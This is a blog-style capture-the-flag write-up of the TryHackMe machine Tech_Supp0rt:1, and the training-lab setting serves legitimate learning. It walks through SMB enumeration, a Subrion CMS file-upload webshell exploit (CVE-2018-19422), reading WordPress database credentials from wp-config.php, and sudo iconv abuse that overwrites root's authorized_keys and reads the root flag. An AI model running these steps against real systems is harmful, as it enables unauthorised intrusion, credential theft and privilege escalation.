Tech_Supp0rt: 1 - TryHackMe

-
Welcome file

Welcome to another CTF-writeup !! Tech_support:1 by vikaran. What we can learn from this machine.

  • nmap scan , smbmap etc. (enumeration skills)
  • subrion cms 4.2.1 RCE
  • iconv sudo permission to overwritten files and read the files

Let’s start with enumeration. First with nmap to see what port we have in the box.

Nmap scan

┌──(defalt@kali)-[~/Documents/tryhackme/Tech_Supp0rt:1]
└─$ nmap -sC -sV 10.10.168.200
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-15 21:29 PDT
Nmap scan report for 10.10.168.20
Host is up (0.37s latency).
Not shown: 996 closed tcp ports (conn-refused)

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:
| 2048 10:8a:f5:72:d7:f9:7e:14:a5:c5:4f:9e:97:8b:3d:58 (RSA)
| 256 7f:10:f5:57:41:3c:71:db:b5:5b:db:75:c9:76:30:5c (ECDSA)
|_ 256 6b:4c:23:50:6f:36:00:7c:a6:7c:11:73:c1:a8:60:0c (ED25519)

80/tcp open http Apache httpd 2.4.18 ((Ubuntu))

|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)

139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: TECHSUPPORT; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-time:
| date: 2022-04-16T04:29:37
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: techsupport
| NetBIOS computer name: TECHSUPPORT\x00
| Domain name: \x00
| FQDN: techsupport
|_ System time: 2022-04-16T09:59:38+05:30
|_clock-skew: mean: -1h50m00s, deviation: 3h10m30s, median: -1s
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 42.93 seconds

Nmap scan shows we got a webpage on port 80 and 445 smb also open. Let’s see the webpage.

Feroxbuster or Gobuster

I ran feroxbuster(It is a new web dir search tool written with R) to see is there any directories. I found 2 useful web directories.

  • /test/ - hint

  • /icon/ - 403 forbidden

  • /wordpress/ -404 not found

I try to run wpscan and found a account called support.

Playing with Smbmap and Smbclient

Let’s head over to port 445 smb. When we map the smb port we can see read only disk called websvr.

┌──(defalt@kali)-[~/Documents/tryhackme/Tech_Supp0rt:1]
└─$ smbmap -H 10.10.168.200
[+] Guest session IP: 10.10.168.200:445 Name: 10.10.168.200
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
websvr READ ONLY
IPC$ NO ACCESS IPC Service (TechSupport server (Samba, Ubuntu))

Let’s try to login to websvr without password.

┌──(defalt@kali)-[~/Documents/tryhackme/Tech_Supp0rt:1]
└─$ smbclient \\\\10.10.168.200\\websvr
Enter WORKGROUP\defalt's password:
Try "help" to get a list of possible commands.

smb: \> ls
. D 0 Sat May 29 00:17:38 2021
.. D 0 Sat May 29 00:03:47 2021
enter.txt N 273 Sat May 29 00:17:38 2021
8460484 blocks of size 1024. 5698356 blocks available
smb: \> get enter.txt
getting file \enter.txt of size 273 as enter.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \> exit

When we log into the websvr we can see one file called enter.txt Let’s read the file maybe it could contain some password.

┌──(defalt@kali)-[~/Documents/tryhackme/Tech_Supp0rt:1]
└─$ cat enter.txt
GOALS
=====
1)Make fake popup and host it online on Digital Ocean server
2)Fix subrion site, /subrion doesn't work, edit from panel
3)Edit wordpress website  

IMP
===
Subrion creds
|->admin:7sKvntXdPEJaxazce9PXi24****** [cooked with magical formula]
Wordpress creds
|->

My guess is correct ! we found subrion creds but It encoded with magic. Let’s decode this with cyberchef.

Subrion Panel

After I read about subrion cms through github (https://github.com/intelliants/subrion) I setup a gobuster scan to scan /subrion directory. It found a directory called /panel just like our note says. Let’s log with our creds.

This subrion CMS version also vurnerable to RSE. Before we go looking into exploit I look inside in the panel. We have a upload tab to upload our reverse shell.

We can upload php file to get access to system. But I tried different thing instead of uploading reverse shell I tried this script to do the dirty work.

Script : https://github.com/h3v0x/CVE-2018-19422-SubrionCMS-RCE

But if you wanna upload a file and do it yourself makesure your php file should be .phar.

┌──(defalt@kali)-[~/Documents/tryhackme/Tech_Supp0rt:1/CVE-2018-19422-SubrionCMS-RCE]
└─$ python3 SubrionRCE.py -u http://10.10.168.200/subrion/panel/ -l admin -p Scam2021
[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422

[+] Trying to connect to: http://10.10.168.200/subrion/panel/
[+] Success!
[+] Got CSRF token: sRY9GS572zbGcZo8uzRpF49eoXhYbDTO9LZfOdYx
[+] Trying to log in...
[+] Login Successful!
[+] Generating random name for Webshell...
[+] Generated webshell name: eerqehzwsunpqxn
[+] Trying to Upload Webshell..
[+] Upload Success... Webshell path: http://10.10.168.200/subrion/panel/uploads/eerqehzwsunpqxn.phar

$ whoami
www-data

$ ls -la /home
total 12

drwxr-xr-x 3 root root 4096 May 28 2021 .
drwxr-xr-x 23 root root 4096 May 28 2021 ..
drwxr-xr-x 4 scamsite scamsite 4096 May 29 2021 scamsite

We got into www-data and we got a user called scamsite. First see through wordpress. Because earlier I saw web directory called wordpress.

Looking for wp-config file

$ ls -la /var/www/html/wordpress/
total 220

drwxr-xr-x 5 www-data www-data 4096 May 29 2021 .
drwxr-xr-x 5 root root 4096 May 29 2021 ..
-rw-r--r-- 1 www-data www-data 543 May 29 2021 .htaccess
-rwxr-xr-x 1 www-data www-data 405 Feb 6 2020 index.php
-rwxr-xr-x 1 www-data www-data 19915 Jan 1 2021 license.txt
-rwxr-xr-x 1 www-data www-data 7345 Dec 30 2020 readme.html
-rwxr-xr-x 1 www-data www-data 7165 Jan 21 2021 wp-activate.php
drwxr-xr-x 9 www-data www-data 4096 May 13 2021 wp-admin
-rwxr-xr-x 1 www-data www-data 351 Feb 6 2020 wp-blog-header.php
-rwxr-xr-x 1 www-data www-data 2328 Feb 17 2021 wp-comments-post.php
-rwxr-xr-x 1 www-data www-data 2992 May 29 2021 wp-config.php
drwxr-xr-x 6 www-data www-data 4096 May 29 2021 wp-content
-rwxr-xr-x 1 www-data www-data 3939 Jul 31 2020 wp-cron.php

We found a wp-config file. Let’s see what we got here.

$ cat /var/www/html/wordpress/wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //

/** The name of the database for WordPress */
define( 'DB_NAME', 'wpdb' );

/** MySQL database username */
define( 'DB_USER', 'support' );

/** MySQL database password */
define( 'DB_PASSWORD', 'ImASca***********!123!' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The Database Collate type. Don't change this if  in doubt. */
define( 'DB_COLLATE', '' );

We got a password let’s try to log into scamsite user.

ssh session to scamsite user

┌──(defalt@kali)-[~/Documents/tryhackme/Tech_Supp0rt:1/CVE-2018-19422-SubrionCMS-RCE]
└─$ ssh scamsite@10.10.168.200
The authenticity of host '10.10.168.200 (10.10.168.200)' can't be established.

ED25519 key fingerprint is 
SHA256:J/HR9GKX4ReRvs4I9fnMwmJrOTL5B3skZ4owxwxWoyM.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.168.200' (ED25519) to the list of known hosts.
scamsite@10.10.168.200's password:
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-186-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
    
120 packages can be updated.
88 updates are security updates.
Last login: Fri May 28 23:30:20 2021

scamsite@TechSupport:~$

We get into our user account. Let’s see what we got on this.

sudo privileges

Before ran emumerting scripts like linpeas. Let’s see about sudo privileges given into the user.

scamsite@TechSupport:~$ sudo -l
Matching Defaults entries for scamsite on TechSupport:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User scamsite may run the following commands on TechSupport:
(ALL) NOPASSWD: /usr/bin/iconv

I search about this on gtfobins(https://gtfobins.github.io/gtfobins/iconv/).

I think we got two methods to get a root flag.

Method 1 - Login into root account

We can overwritten or put a new ssh key to the system. First we need to genarate a ssh key on our machine by typing ssh-keygen command and do the following commands.

LFILE=/root/.ssh/authorized_keys

echo  "your id_rsa.pub" | sudo iconv -f 8859_1 -t 8859_1 -o "$LFILE"

Then we can log into the root account by using our private key.

┌──(defalt@kali)-[~/Documents/tryhackme/Tech_Supp0rt:1]
└─$ ssh root@10.10.252.87 -i id_rsa
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-186-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

120 packages can be updated.
88 updates are security updates.
Last login: Sun Nov 21 11:17:57 2021

root@TechSupport:~# ls
root.txt
root@TechSupport:~# cat root.txt
851b8233a8c09400ec30651bd152********** -
root@TechSupport:~#

Method 2

We don’t need to login to see root flag by using this command.

sudo -u root iconv -f 8859_1 -t 8859_1 "/root/root.txt"

My github write-up : https://github.com/Defalt-cloud/CTF-Writeups/blob/main/TryHackMe/Tech_Supp0rt:1/Tech_Supp0rt.md

Thx for reading !! Have a nice day

Popular posts from this blog

Mustacchio - TryHackMe

-
Image
thm What we can learn from this machine : XXE injection Enumerations SUID exploit let’s start with a nmap scan. normal nmap scan found port 80 webserver called Mustacchio and port 22 ssh open running ubuntu. I try to running a full nmap scan for see more ports are open above the port 1000. # Nmap 7.91 scan initiated Sat Jun 12 14:57:25 2021 as: nmap -sC -sV -p- -oN scans/nmap-allports 10.10.236.36 Nmap scan report for 10.10.236.36 Host is up (0.15s latency). Not shown: 65532 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 d3:9e:50:66:5f:27:a0:60:a7:e8:8b:cb:a9:2a:f0:19 (RSA) | 256 5f:98:f4:5d:dc:a1:ee:01:3e:91:65:0a:80:52:de:ef (ECDSA) |_ 256 5e:17:6e:cd:44:35:a8:0b:46:18:cb:00:8d:49:b3:f6 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-robots.txt: 1 disallowed entry |_/ |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-t...
Read more

Nmap - TryHackMe!

-
Image
nmap Task 2 What networking constructs are used to direct traffic to the right application on a server? ports How many of these are available on any network-enabled computer? 65535 [Research] How many of these are considered “well-known”? (These are the “standard” numbers mentioned in the task)? 1024 Task 3 What is the first switch listed in the help menu for a ‘Syn Scan’ (more on this later!)? -sS Which switch would you use for a “UDP scan”? -sU If you wanted to detect which operating system the target is running on, which switch would you use? -O Nmap provides a switch to detect the version of the services running on the target. What is this switch? -sV The default output provided by nmap often does not provide enough information for a pentester. How would you increase the verbosity? -v Verbosity level one is good, but verbosity level two is better! How would you set the verbosity level to two? (Note: it’s highly advisable to a...
Read more